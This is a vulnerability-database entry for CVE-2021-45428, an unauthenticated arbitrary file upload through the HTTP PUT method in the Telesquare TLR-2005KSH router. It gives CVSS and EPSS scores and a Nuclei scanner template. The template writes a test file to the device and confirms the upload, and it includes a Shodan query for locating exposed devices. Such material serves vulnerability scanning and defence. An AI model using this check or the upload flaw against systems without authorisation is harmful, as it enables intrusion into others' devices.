Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-45428
HistoryMay 18, 2022 - 11:38 p.m.

Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload

2022-05-1823:38:13
ProjectDiscovery
github.com
43
cve2021
telesquare
arbitraryfileupload
dataleakage

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.09

Percentile

94.7%

TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
id: CVE-2021-45428

info:
  name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
  author: gy741
  severity: critical
  description: |
    TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized accessand data leakage.
  remediation: |
    Apply the latest security patch or update to a version that addresses the arbitrary file upload vulnerability.
  reference:
    - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
    - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45428
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45428
    cwe-id: CWE-639
    epss-score: 0.07905
    epss-percentile: 0.94241
    cpe: cpe:2.3:h:telesquare:tlr-2005ksh:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: telesquare
    product: tlr-2005ksh
    shodan-query: http.html:"TLR-2005KSH"
  tags: cve2021,cve,telesquare,intrusive,fileupload,packetstorm

http:
  - raw:
      - |
        GET /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        PUT /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

        CVE-2021-45428
      - |
        GET /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 404 && status_code_2 == 201'
          - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
        condition: and
# digest: 4a0a0047304502202718554de68c4dfea45dd175d9bfc340ea2425b0a8462130ba0953be4c1e639a022100f1ddc7a753fcf66912b2e484b36bca1e71c869f04023b7686722e43a182521d3:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.09

Percentile

94.7%